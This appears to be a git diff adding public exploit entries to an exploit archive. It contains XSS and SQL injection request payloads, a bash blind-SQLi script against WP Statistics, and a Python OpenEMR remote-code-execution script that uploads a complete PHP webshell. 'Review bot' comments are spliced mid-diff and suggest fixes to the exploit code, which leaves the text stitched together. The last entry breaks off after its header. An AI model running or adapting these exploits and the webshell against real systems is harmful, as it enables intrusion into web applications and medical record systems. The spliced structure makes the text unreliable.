diff --git a/exploits/cgi/webapps/49869.py b/exploits/cgi/webapps/49869.py index 88330180d..e917692a5 100755 --- a/exploits/cgi/webapps/49869.py +++ b/exploits/cgi/webapps/49869.py @@ -5,6 +5,7 @@ # Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso # Version: 2.25 - core update 156 # Tested on: parrot os 5.7.0-2parrot2-amd64 +# CVE: CVE-2021-33393 #!/usr/bin/python3 diff --git a/exploits/multiple/webapps/49980.txt b/exploits/multiple/webapps/49980.txt new file mode 100644 index 000000000..8a7b4db8d --- /dev/null +++ b/exploits/multiple/webapps/49980.txt 
@@ -0,0 +1,80 @@
+# Exploit Title: Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)
+# Exploit Author: Abdulazeez Alaseeri
+# Software Link: https://www.accela.com/civic-platform/
+# Version: <= 21.1
+# Tested on: JBoss server/windows
+# Type: Web App
+# Date: 06/07/2021
+# CVE: CVE-2021-33904
+
+
+================================================================
+Accela Civic Platform Cross-Site-Scripting <= 21.1
+================================================================
+
+
+================================================================
+Request Heeaders start
+================================================================
+
+GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9 HTTP/1.1
+
+Host: Hidden for security reasons
+
+Cookie: JSESSIONID=FBjC0Zfg-H87ecWmTMDEcNo8HID1gB6rwBt5QC4Y.civpnode; LASTEST_REQUEST_TIME=1623004368673; g_current_language_ext=en_US; hostSignOn=true; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LATEST_SESSION_ID=lVkV3izKpk9ig1g_nqSktJ3YKjSbfwwdPj0YBFDO; LATEST_WEB_SERVER=1.1.1.1; LATEST_LB=1360578058.47873.0000
+
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+Upgrade-Insecure-Requests: 1
+
+Te: trailers
+
+Connection: close
+
+================================================================
+Request Heeaders end
+================================================================
+
+
+
+================================================================
+Response Heeaders start
+================================================================
+HTTP/1.1 200 OK
+
+Expires: Wed, 31 Dec 1969 23:59:59 GMT
+
+Cache-Control: no-cache
+
+X-Powered-By: JSP/2.3
+
+Set-Cookie: LASTEST_REQUEST_TIME=1623004478373; path=/; domain=.Hidden for security reasons; secure
+
+Set-Cookie: g_current_language_ext=en_US; path=/; domain=.Hidden for security reasons; secure
+
+Set-Cookie: hostSignOn=true; path=/; domain=.Hidden for security reasons; secure
+
+X-XSS-Protection: 0
+
+Pragma: No-cache
+
+Date: Sun, 06 Jun 2021 18:34:38 GMT
+
+Connection: close
+
+Content-Type: text/html;charset=UTF-8
+
+Content-Length: 13222
+================================================================
+Response Heeaders end
+================================================================
+
+
+You can notice that the parameter "servProvCode" is vulnerable to XSS.
+Payload: k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49981.txt b/exploits/multiple/webapps/49981.txt
new file mode 100644
index 000000000..5424be18b
--- /dev/null
+++ b/exploits/multiple/webapps/49981.txt
@@ -0,0 +1,62 @@
+# Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)
+# Date: 08/06/2021
+# Exploit Author: Mohammad Hossein Kaviyany
+# Vendor Homepage: www.cerberusftp.com
+# Software Link: https://www.cerberusftp.com/download/
+# Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier
+# Tested on: windows server 2016
+------------
+About Cerberus FTP Server (From Vendor Site) :
+
+Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS,
+FIPS 140-2 validated, and Active Directory and LDAP authentication.
+--------------------------------------------------------
+Exploit Detailes :
+
+This stored XSS bug happens when a user uploads an svg file with the following content :
+
+
+Exploit POC :
+
+# Vulnerable Path : /file/upload
+# Parameter: files (POST)
+# Vector:
+
+#Payload:
+
+POST /file/upload HTTP/1.1
+Host: target.com
+Connection: close
+Content-Length: 484
+sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAM6ZtOAsyklo6JG
+Origin: https://target.com
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://target.com/file/d/home/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: cftpSID=U02_5UCTumW3vFtt5PrlWwoD4k9ccxW0A87oCM8-jsM
+
+------WebKitFormBoundaryAAM6ZtOAsyklo6JG
+Content-Disposition: form-data; name="cd"
+
+/home
+------WebKitFormBoundaryAAM6ZtOAsyklo6JG
+Content-Disposition: form-data; name="csrftoken"
+
+z-Zlffq0sPaJErxOsMgL4ITcW1x3AuZo3XlZRP5GcKg
+------WebKitFormBoundaryAAM6ZtOAsyklo6JG
+Content-Disposition: form-data; name="files[]"; filename="file.svg"
+Content-Type: image/svg+xml
+
+
+
+------WebKitFormBoundaryAAM6ZtOAsyklo6JG--
+
+--------------------------
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49985.txt b/exploits/multiple/webapps/49985.txt
new file mode 100644
index 000000000..e6b485f5f
--- /dev/null
+++ b/exploits/multiple/webapps/49985.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Grocery crud 1.6.4 - 'order_by' SQL Injection
+# Date: 11/06/1963
+# Exploit Author: TonyShavez
+# Vendor Homepage: https://www.grocerycrud.com/
+# Software Link: https://www.grocerycrud.com/downloads
+# Version: < v2.0.1
+# Tested on: [Linux Ubuntu]
+
+Proof Of concept :
+=======================
+#Request:
+
+POST /path/to/ajax_list HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 68
+DNT: 1
+Connection: close
+
+page=1&per_page=100&order_b=&order_by[]={INJECT HERE}&search_field=&search_text=
+=======================
+#vulnerable parameter :
+
+order_by
+=======================
+#type : [error-based]
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49986.txt b/exploits/multiple/webapps/49986.txt
new file mode 100644
index 000000000..6faaa230b
--- /dev/null
+++ b/exploits/multiple/webapps/49986.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Solar-Log 500 2.8.2 - Incorrect Access Control
+# Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP""
+# Date: 2021-06-11
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.solar-log.com/en/
+# Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/
+# Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013
+# Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/
+
+# 1. Description:
+# The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication,
+# which allows arbitrary remote attackers to gain administrative privileges by connecting to the server.
+# As a result, the attacker can modify configuration files and change the system status.
+
+# 2. Proof of Concept:
+# Access the /lan.html of Solar-Log 500 without ANY authentication,
+# and you can get gain administrative privileges to modify configuration files and change the system status.
+# http:///lan.html
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49987.txt b/exploits/multiple/webapps/49987.txt
new file mode 100644
index 000000000..283842699
--- /dev/null
+++ b/exploits/multiple/webapps/49987.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Solar-Log 500 2.8.2 - Unprotected Storage of Credentials
+# Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP""
+# Date: 2021-06-11
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.solar-log.com/en/
+# Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/
+# Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013
+# Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/
+
+# 1. Description:
+# An issue was discovered in Solar-Log 500 prior to 2.8.2 Build 52 - 23.04.2013.
+# In /export.html, email.html, sms.html, the devices store plaintext passwords,
+# which may allow sensitive information to be read by someone with access to the device.
+
+# 2. Proof of Concept:
+# Browse the configuration page in Solar-Log 500,
+# we can find out that the passwords of FTP, SMTP, SMS services are stored in plaintext.
+# http:///export.html
+# http:///email.html
+# http:///sms.html
\ No newline at end of file
diff --git a/exploits/php/webapps/49894.sh b/exploits/php/webapps/49894.sh
new file mode 100755
index 000000000..1c4042eb9
--- /dev/null
+++ b/exploits/php/webapps/49894.sh
@@ -0,0 +1,130 @@
+# Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)
+# Date: 20/05/2021
+# Exploit Author: Mansoor R (@time4ster)
+# CVSS Score: 7.5 (High)
+# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+# Version Affected: 13.0 to 13.0.7
+# Vendor URL: https://wordpress.org/plugins/wp-statistics/
+# Patch: Upgrade to wp-statistics 13.0.8 (or above)
+# Tested On: wp-statistics 13.0.6,13.0.7
+
+#!/bin/bash
+
+# Credits:
+# https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
+
+# SQLmap Exploit for grepping database banner (automated):
+# sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --techniqu=T --dbms="mysql" -p "ID" -b
+
+# WARNINGS:
+# Only test the exploit on websites you are authorized to.
+# The exploit will perform sleep for 3 seconds. Don't use on production server of organization without prior permissions.
+
+
+# Exploit
+# ==============
+
+echo
+echo "============================================================================================"
+echo "Unauthenticated Time-Based Blind SQL Injection in WP Statistics < 13.0.8"
+echo
+echo "By: Mansoor R (@time4ster)"
+echo "============================================================================================"
+echo
+
+
+
+function printHelp()
+{
+ echo -e "
+Usage:
+
+-u|--wp-url Wordpress target url
+-k|--check Only checks whether vulnerable version of plugin is running or not.
+-h|--help Print Help menu
+
+
+Example:
+./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress
+./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress --check
+"
+}
+
+#Processing arguments
+check="false"
+exploit="true"
+while [[ "$#" -gt 0 ]]
+do
+key="$1"
+
+case "$key" in
+ -u|--wp-url)
+ wp_url="$2"
+ shift
+ shift # past argument
+ ;;
+ -k|--check)
+ check="true"
+ exploit="false"
+ shift
+ shift
+ ;;
+ -h|--help)
+ printHelp
+ exit
+ shift
+ ;;
+ *)
+ echo [-] Enter valid options
+ exit
+ ;;
+esac
+done
+
+[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL. Use -h for help menu." && exit
+
+function checkVersion()
+{
+ url="$1"
+ [[ -z "$url" ]] && return
+ target_endpoint="$url/wp-content/plugins/wp-statistics/readme.txt"
+ user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
+
+ version=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i -m 1 "stable tag:" | grep -o -E "[0-9]+\.[0-9]+\.[0-9]+")
+ [[ -n "$version" ]] && echo "[+] WP-statistical Plugin Version: $version"
+ [[ -z "$version" ]] && echo "[-] WP-statistical Unable to detect version." && return
+
+ vuln_version=(13.0.7 13.0.6 13.0.5 13.0.4 13.0.3 13.0.1 13.0)
+ is_vulnerable="false"
+ for v in "${vuln_version[@]}";do
+ [[ "$version" == "$v" ]] && is_vulnerable="true" && break
+ done
+ [[ "$is_vulnerable" == "true" ]] && echo "[++] Target $url is Vulnerable"
+ [[ "$is_vulnerable" == "false" ]] && echo "[--] Target $url is Not Vulnerable"
+}
+
+function exploitPlugin()
+{
+ url="$1"
+ target_endpoint="$url/wp-admin/admin.php"
+ user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
+ sleep=3
+ payload="ID=1 AND (SELECT * from (select SLEEP($sleep))a)"
+
+ echo -e -n "[!] Caution: You are going to execute sleep database command for $sleep seconds. 
Proceed only if you have permission.\nPress (Y/y) to continue or any other key to exit: "
+ read choice
+ [[ "$choice" != "y" ]] && [[ "$choice" != "Y" ]] && return
+
+ echo
+ echo "[+] Trying Payload:"
+ set -x
+ curl -v -ks -G --user-agent "$user_agent" "$target_endpoint" \
+ --data-urlencode "page=wps_pages_page" \
+ --data-urlencode "type=1" \
+ --data-urlencode "$payload"
+
+
+}
+
+[[ "$check" == "true" ]] && checkVersion "$wp_url"
+[[ "$exploit" == "true" ]] && exploitPlugin "$wp_url"
\ No newline at end of file
diff --git a/exploits/php/webapps/49983.py b/exploits/php/webapps/49983.py
new file mode 100755
index 000000000..df2653cfb
--- /dev/null
+++ b/exploits/php/webapps/49983.py
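Review bot: The `#!/bin/bash` line is placed after the header comment block rather than on line 1, so the kernel never reads it and the script runs under whatever shell the caller happens to invoke; because the body relies on `[[ ]]`, arrays and the `function` keyword, the file should open with `#!/bin/bash` and carry the header comments below it. The usage examples printed by printHelp advertise `--wp_url`, while the case statement only matches `-u|--wp-url`, so anyone copying the example lands in the `Enter valid options` branch. `set -x` is switched on before the curl invocation in exploitPlugin and never switched back off with `set +x`, which looks like leftover debugging and echoes the full command line to stderr.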
@@ -0,0 +1,308 @@ +# Exploit Title: OpenEMR 5.0.0 - Remote Code Execution (Authenticated) +# Date 10.06.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://sourceforge.net/projects/openemr/files/OpenEMR%20Current/5.0.0/openemr-5.0.0.zip/download +# Version: 5.0.0 +# Tested on: Windows 10 +# CVE: CVE-2017-9380 +# Documentation: https://github.com/Hacker5preme/Exploits#cve-2017-9380-exploit + +''' +Description: +The OpenEMR application allows users from all roles to upload files. However, the application does not whitelist only +certain type of files (e.g. PDF, JPG, PNG, DOCX, etc). At the contary, any type of files can be uploaded to the +filesystem via the application. While OpenEMR recommends during the installation to restrict access to the repository +hosting uploaded files, unfortunately, such recommendations are too often ignored by users and can result in full +compromise of the web server and its data. +''' + + +''' +Import required modules: +''' +import argparse +import requests +import string +import random + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Exploit for CVE-2017-9380') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +openemr_path = args.PATH +username = args.USERNAME +password = args.PASSWORD + + +''' +Exploit: +''' +# Authentication preparation: +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' +auth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default' +response = session.get(auth_chek_url) + +# Header 
(auth): +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Referer': auth_chek_url, + 'Upgrade-Insecure-Requests': '1', +} + +# Body (auth): +body = { + 'new_login_session_management': '1', + 'authProvider': 'Default', + 'authUser': username, + 'clearPass': password, + 'languageChoice': '1' +} + +# Authenticate: +print('') +print('[+] Authentication') +auth = session.post(auth_url,headers=header, data=body) + +# Create random patient name: +letters_up = string.ascii_uppercase +letters_down = string.ascii_lowercase +first_name = ''.join(random.choice(letters_up)) + ''.join(random.choice(letters_down) for i in range(10)) +surname = ''.join(random.choice(letters_up)) + ''.join(random.choice(letters_down) for i in range(7)) +print('') +print('[+] Creating patient name randomly:') +print(' [*] First Name: ' + first_name) +print(' [*] Surname: ' + surname) + +# Registration preparation: +url_reg = 'http://' + target_ip + ':' + target_port + openemr_path + 'interface/new/new_comprehensive_save.php' + +# Header (registration): +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Referer': 'http://' + target_ip + ':' + target_port + openemr_path + 'interface/new/new.php', + 'Upgrade-Insecure-Requests': '1' +} +body = { + 'form_cb_1': '1', + 
'form_title': 'Mr.', + 'form_fname': first_name, + 'form_mname': '', + 'form_lname': surname, + 'form_pubpid': '', + 'form_DOB': '2021-05-04', + 'form_sex': 'Male', + 'form_ss': '', + 'form_drivers_license': '', + 'form_status': '', + 'form_genericname1': '', + 'form_genericval1': '', + 'form_genericname2': '', + 'form_genericval2': '', + 'form_billing_note': '', + 'form_street': '', + 'form_city': '', + 'form_state': '', + 'form_postal_code': '', + 'form_county': '', + 'form_country_code': '', + 'form_mothersname': '', + 'form_contact_relationship': '', + 'form_phone_contact': '', + 'form_phone_home': '', + 'form_phone_biz': '', + 'form_phone_cell': '', + 'form_email': '', + 'form_email_direct': '', + 'form_providerID': '', + 'form_ref_providerID': '', + 'form_pharmacy_id': '0', + 'form_hipaa_notice': '', + 'form_hipaa_voice': '', + 'form_hipaa_message': '', + 'form_hipaa_mail': '', + 'form_hipaa_allowsms': '', + 'form_hipaa_allowemail': '', + 'form_allow_imm_reg_use': '', + 'form_allow_imm_info_share': '', + 'form_allow_health_info_ex': '', + 'form_allow_patient_portal': '', + 'form_care_team': '', + 'form_cmsportal_login': '', + 'form_imm_reg_status': '', + 'form_imm_reg_stat_effdate': '', + 'form_publicity_code': '', + 'form_publ_code_eff_date': '', + 'form_protect_indicator': '', + 'form_prot_indi_effdate': '', + 'form_industry': '', + 'form_occupation': '', + 'form_em_name': '', + 'form_em_street': '', + 'form_em_city': '', + 'form_em_state': '', + 'form_em_postal_code': '', + 'form_em_country': '', + 'form_language': '', + 'form_ethnicity': '', + 'form_family_size': '', + 'form_financial_review': '', + 'form_monthly_income': '', + 'form_homeless': '', + 'form_interpretter': '', + 'form_migrantseasonal': '', + 'form_referral_source': '', + 'form_vfc': '', + 'form_religion': '', + 'form_deceased_date': '', + 'form_deceased_reason': '', + 'form_guardiansname': '', + 'form_guardianrelationship': '', + 'form_guardiansex': '', + 'form_guardianaddress': '', + 
'form_guardiancity': '', + 'form_guardianstate': '', + 'form_guardianpostalcode': '', + 'form_guardiancountry': '', + 'form_guardianphone': '', + 'form_guardianworkphone': '', + 'form_guardianemail': '', + 'i1provider': '', + 'i1plan_name': '', + 'i1effective_date': '', + 'i1policy_number': '', + 'i1group_number': '', + 'i1subscriber_employer': '', + 'i1subscriber_employer_street': '', + 'i1subscriber_employer_city': '', + 'form_i1subscriber_employer_state': '', + 'i1subscriber_employer_postal_code': '', + 'form_i1subscriber_employer_country': '', + 'i1subscriber_fname': '', + 'i1subscriber_mname': '', + 'i1subscriber_lname': '', + 'form_i1subscriber_relationship': '', + 'i1subscriber_DOB': '', + 'i1subscriber_ss': '', + 'form_i1subscriber_sex': '', + 'i1subscriber_street': '', + 'i1subscriber_city': '', + 'form_i1subscriber_state': '', + 'i1subscriber_postal_code': '', + 'form_i1subscriber_country': '', + 'i1subscriber_phone': '', + 'i1copay': '', + 'i1accept_assignment': 'TRUE', + 'i2provider': '', + 'i2plan_name': '', + 'i2effective_date': '', + 'i2policy_number': '', + 'i2group_number': '', + 'i2subscriber_employer': '', + 'i2subscriber_employer_street': '', + 'i2subscriber_employer_city': '', + 'form_i2subscriber_employer_state': '', + 'i2subscriber_employer_postal_code': '', + 'form_i2subscriber_employer_country': '', + 'i2subscriber_fname': '', + 'i2subscriber_mname': '', + 'i2subscriber_lname': '', + 'form_i2subscriber_relationship': '', + 'i2subscriber_DOB': '', + 'i2subscriber_ss': '', + 'form_i2subscriber_sex': '', + 'i2subscriber_street': '', + 'i2subscriber_city': '', + 'form_i2subscriber_state': '', + 'i2subscriber_postal_code': '', + 'form_i2subscriber_country': '', + 'i2subscriber_phone': '', + 'i2copay': '', + 'i2accept_assignment': 'TRUE', + 'i3provider': '', + 'i3plan_name': '', + 'i3effective_date': '', + 'i3policy_number': '', + 'i3group_number': '', + 'i3subscriber_employer': '', + 'i3subscriber_employer_street': '', + 
'i3subscriber_employer_city': '', + 'form_i3subscriber_employer_state': '', + 'i3subscriber_employer_postal_code': '', + 'form_i3subscriber_employer_country': '', + 'i3subscriber_fname': '', + 'i3subscriber_mname': '', + 'i3subscriber_lname': '', + 'form_i3subscriber_relationship': '', + 'i3subscriber_DOB': '', + 'i3subscriber_ss': '', + 'form_i3subscriber_sex': '', + 'i3subscriber_street': '', + 'i3subscriber_city': '', + 'form_i3subscriber_state': '', + 'i3subscriber_postal_code': '', + 'form_i3subscriber_country': '', + 'i3subscriber_phone': '', + 'i3copay': '', + 'i3accept_assignment': 'TRUE'} + +print('') +print('[+] Registering patient:') +x = session.post(url_reg, headers=header, data=body).text + +# Get Patient-ID: +id = x[(x.find('pid=')+4):x.find('&')] +print(' [*] ID-NUMBER: ' + id) + +# Construct upload URL: +url_upload = 'http://' + target_ip + ':' + target_port + openemr_path + '/controller.php?document&upload&patient_id=' + id + '&parent_id=1&"' + +# Header (upload): +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------370797319835249590062969815666", + "Origin": 'http://' + target_ip, + "Connection": "close", + "Referer": url_upload, + "Upgrade-Insecure-Requests": "1" +} + +# Body (shell); I'm using p0wny shell: https://github.com/flozz/p0wny-shell +body = "-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n64000000\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"file[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n 
preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: 
application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n
\n                
\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n
\n
\n
\n \n
\n \n
\n
\n
\n \n\n\n\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"destination\"\r\n\r\n\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"patient_id\"\r\n\r\n4\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n4\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"process\"\r\n\r\ntrue\r\n-----------------------------370797319835249590062969815666--\r\n" + +# Exploit +x = session.post(url_upload, headers=header,data=body).text +print('') +print('[+] Uploading your Webshell') +b = x[x.find('documents/') + 10:] +c = b[:b.find('<')] +webshellpath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/documents/' + c +print(' [*] Webshell: ' + webshellpath) +print('') \ No newline at end of file diff --git a/exploits/php/webapps/49984.html b/exploits/php/webapps/49984.html new file mode 100644 index 000000000..deea13c11 --- /dev/null +++ b/exploits/php/webapps/49984.html @@ -0,0 +1,20 @@ +# Exploit Title: WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF +# Date: 2/10/2021 +# Author: 0xB9 +# Software Link: https://wordpress.org/plugins/database-backups/ +# Version: 1.2.2.6 +# Tested on: Windows 10 +# CVE: CVE-2021-24174 + +1. Description: +This plugin allows admins to create and download database backups. A CSRF can create DB backups stored publicly in the uploads directory. + +2. Proof of Concept: + +
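Review bot: `id = x[(x.find('pid=')+4):x.find('&')]` shadows the builtin `id` and, because `str.find` returns -1 when either marker is absent, slices an arbitrary chunk of the response instead of failing; a non-shadowing name such as `patient_id` with an explicit check that both markers were found would make the failure visible. The authentication response is bound to `auth` but never inspected, and the later steps run regardless. The module also performs all its work at import time with no function boundaries, no `__main__` guard and no docstrings beyond the header block, and `auth_chek_url` is misspelled. The multipart upload is a single hand-assembled string with a fixed boundary; `requests` builds the same body from a `files=` mapping, which is far easier to read.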
+ + +
+ +Backups can be accessed by the following URL. +http://localhost/wp-content/uploads/database-backups/ \ No newline at end of file diff --git a/exploits/php/webapps/49988.txt b/exploits/php/webapps/49988.txt new file mode 100644 index 000000000..23eda102c --- /dev/null +++ b/exploits/php/webapps/49988.txt @@ -0,0 +1,26 @@ +# Exploit Title: Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated) +# Date: 05–02–2021 +# Exploit Author: Avinash R +# Vendor Homepage: https://zenar.io/ +# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8 +# Version: 8.8.52729 +# Tested on: Windows 10 Pro (No OS restrictions) +# CVE : CVE-2021–27673 +# Reference: https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38 + +##### Step To Reproduce ##### + +1) Login to the admin page of Zenario CMS with admin credentials, which is +http://server_ip/zenario/admin.php + +2) Click on, New → HTML page to create a new sample page and intercept it +with your interceptor. + +3) Just a single quote on the 'cID' parameter will confirm the SQL +injection. + +4) After confirming that the 'cID' parameter is vulnerable to SQL +injection, feeding the request to SQLMAP will do the rest of the work for +you. + +############ End ############ \ No newline at end of file diff --git a/exploits/php/webapps/49989.py b/exploits/php/webapps/49989.py new file mode 100755 index 000000000..798965869 --- /dev/null +++ b/exploits/php/webapps/49989.py 
@@ -0,0 +1,46 @@
+# Exploit Title: WoWonder Social Network Platform 3.1 - Authentication Bypass
+# Date: 11.06.2021
+# Exploit Author: securityforeveryone.com
